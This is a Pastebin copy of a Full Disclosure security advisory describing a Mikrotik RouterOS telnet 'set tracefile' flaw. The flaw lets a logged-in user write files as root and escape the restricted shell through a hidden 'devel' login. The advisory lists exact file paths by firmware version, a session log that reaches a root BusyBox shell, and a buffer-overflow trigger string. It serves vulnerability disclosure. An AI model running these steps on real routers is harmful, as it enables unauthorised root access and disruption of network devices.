daily pastebin goal
44%
SHARE
TWEET

Untitled

a guest Dec 14th, 2018 51 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Mikrotik RouterOS telnet arbitrary root file creation 0day
  2. ==========================================================
  3. This weakness occurs "post-authentication" and can be used to escape the
  4. restricted shell on Mikrotik devices and escalate "readonly" privileges.
  5. Mikrotik contains a hidden "devel" login option which can be enabled
  6. through use of an "options" package.
  7.  
  8. An exploitable arbitrary file creation weakness has been identified in
  9. Mikrotik RouterOS that can be leveraged by a malicious attacker to exploit
  10. all known versions of Mikrotik RouterOS. The RouterOS contains a telnet
  11. client based on GNU inetutils with modifications to remove shell subsystem.
  12. However an attacker can leverage the "set tracefile" option to write an
  13. arbitrary file into any "rw" area of the filesystem, escaping the
  14. restricted
  15. shell to gain access to a "ash" busybox shell on some versions. The file is
  16. created with root privilieges regardless of the RouterOS defined group.
  17.  
  18. On versions 4.10 to 5.26 an attacker can enable the "devel" login to escape
  19. the restricted shell by creating the following file:
  20.  
  21. "set tracefile /nova/etc/devel-login"
  22.  
  23. On versions 6.0 to 6.40 the same can be achieved with the file:
  24.  
  25. "set tracefile /flash/nova/etc/devel-login"
  26.  
  27. This will allow access to a "ash" shell using the "devel" login which has
  28. the
  29. same password as the "admin" user. Advantages of using this method over
  30. known
  31. public methods is that it does not require reconfiguration of device via
  32. backup
  33. files or require a system reboot. On versions greater than 6.40 this issue
  34. can
  35. be exploited to overwrite files such as "user.db" from low-privileged user
  36. accounts to disrupt operation of the device.
  37.  
  38. On versions above 6.40 this issue can only be leveraged to overwrite files
  39. as
  40. root due to changes in the "devel-login" now requiring creation of an
  41. "option"
  42. folder in a read only partition.
  43.  
  44. An example of exploitation on impacted devices is shown below:
  45.  
  46. [admin@MikroTik] > system telnet
  47. address:
  48. telnet> set tracefile /flash/nova/etc/devel-login
  49. tracefile set to "/flash/nova/etc/devel-login".
  50. telnet> quit
  51.  
  52. Welcome back!
  53. [admin@MikroTik] > system telnet 127.0.0.1
  54. Trying 127.0.0.1...
  55. Connected to 127.0.0.1.
  56. Escape character is '^]'.
  57.  
  58. MikroTik v6.40.9 (bugfix)
  59. Login: devel
  60. Password:
  61.  
  62. BusyBox v1.00 (2018.08.20-07:26+0000) Built-in shell (ash)
  63. Enter 'help' for a list of built-in commands.
  64.  
  65. #
  66.  
  67. Errata: an additional advisory accompanying this one references
  68. multiple buffer overflow vulnerabilities in inetutils telnet clients.
  69. The Mikrotik telnet client is also susciptible to these weaknessses. A
  70. trigger for the overflow condition is shown below.
  71.  
  72. telnet> environ define DISPLAY
  73. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  74. telnet> open 127.0.0.1
  75. Trying 127.0.0.1...
  76. Connected to 127.0.0.1.
  77. Escape character is '^]'.
  78.  
  79. telnet: buffer overflow, losing data, sorry
  80. telnet: ring.cc: 143: int ringbuf::flush(): Assertion `top-bot > 0 &&
  81. top-bot <= count' failed.
  82.  
  83. Welcome back!
  84. [admin@MikroTik] >
  85.  
  86. -- Hacker Fantastic
  87. 11/12/2018
  88.  
  89. https://hacker.house
  90.  
  91. _______________________________________________
  92. Sent through the Full Disclosure mailing list
  93. https://nmap.org/mailman/listinfo/fulldisclosure
  94. Web Archives & RSS: http://seclists.org/fulldisclosure/
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top